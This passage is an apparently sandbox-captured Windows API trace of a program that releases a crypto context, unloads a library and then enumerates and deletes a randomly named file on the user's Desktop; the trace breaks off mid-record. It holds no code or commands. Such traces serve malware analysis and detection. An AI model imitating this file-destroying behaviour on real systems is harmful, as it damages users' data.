0x2e54ea8 [0215.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0215.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0215.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0215.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0215.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0215.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0215.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0215.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0215.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0215.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0215.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0215.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0215.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0215.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0215.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0215.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0215.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0215.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0215.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0215.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0215.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0215.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0215.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0215.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0215.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0215.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0215.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0215.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0215.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0215.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0215.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0215.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0215.530] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0215.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0215.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0215.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0215.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0215.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0215.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0215.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0215.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0215.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0215.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0215.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0215.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0215.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0215.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0215.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0215.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0215.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.531] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0215.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0215.531] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0215.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0215.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0215.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0215.531] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0215.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0215.531] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0215.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0215.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0215.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0215.531] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0215.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0215.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0215.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0215.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0215.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0215.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0215.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0215.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0215.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0215.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0215.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0215.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0215.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0215.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0215.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0215.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0215.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0215.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0215.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0215.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0215.533] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.533] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0215.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0215.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0215.533] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0215.533] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0215.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0215.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0215.533] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.533] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.533] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0215.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0215.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0215.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0215.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0215.534] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0215.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0215.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0215.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0215.534] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0215.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0215.534] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0215.534] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0215.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0215.534] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0215.534] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0215.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0215.535] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.535] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0215.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0215.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0215.535] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0215.535] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0215.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0215.535] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0215.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0215.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0215.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0215.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0215.535] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0215.536] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0215.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0215.536] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0215.536] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0215.536] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0215.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0215.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0215.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0215.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0215.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0215.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0215.537] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0215.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0215.537] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.537] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0215.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0215.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0215.537] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.537] FreeLibrary (hLibModule=0x756e0000) returned 1 [0215.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0215.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0215.537] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0215.537] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0215.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0215.537] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.537] CloseHandle (hObject=0x2a0) returned 1 [0215.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0215.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0215.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0215.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0215.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0215.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0215.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0215.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0215.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0215.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0215.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0215.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0215.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0215.539] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.539] CloseHandle (hObject=0x2d0) returned 1 [0215.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0215.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0215.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0215.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0215.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0215.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0215.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0215.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0215.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0215.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0215.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0215.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0215.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0215.545] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.549] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.549] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0215.549] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/Z3NyFrC6_WxtuHo-dMOg.ots", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Z3NyFrC6_WxtuHo-dMOg.ots", lpFilePart=0x8cedf4*="Z3NyFrC6_WxtuHo-dMOg.ots") returned 0x30 [0215.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0215.549] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Z3NyFrC6_WxtuHo-dMOg.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\z3nyfrc6_wxtuho-dmog.ots")) returned 0x20 [0215.549] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Z3NyFrC6_WxtuHo-dMOg.ots", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ae99980, ftCreationTime.dwHighDateTime=0x1d5e2c2, ftLastAccessTime.dwLowDateTime=0xc281a560, ftLastAccessTime.dwHighDateTime=0x1d5f0de, ftLastWriteTime.dwLowDateTime=0xc281a560, ftLastWriteTime.dwHighDateTime=0x1d5f0de, nFileSizeHigh=0x0, nFileSizeLow=0xcdd9, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="Z3NyFrC6_WxtuHo-dMOg.ots", cAlternateFileName="Z3NYFR~1.OTS")) returned 0xa87250 [0215.550] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Z3NyFrC6_WxtuHo-dMOg.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\z3nyfrc6_wxtuho-dmog.ots")) returned 1 [0215.551] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ae99980, ftCreationTime.dwHighDateTime=0x1d5e2c2, ftLastAccessTime.dwLowDateTime=0xc281a560, ftLastAccessTime.dwHighDateTime=0x1d5f0de, 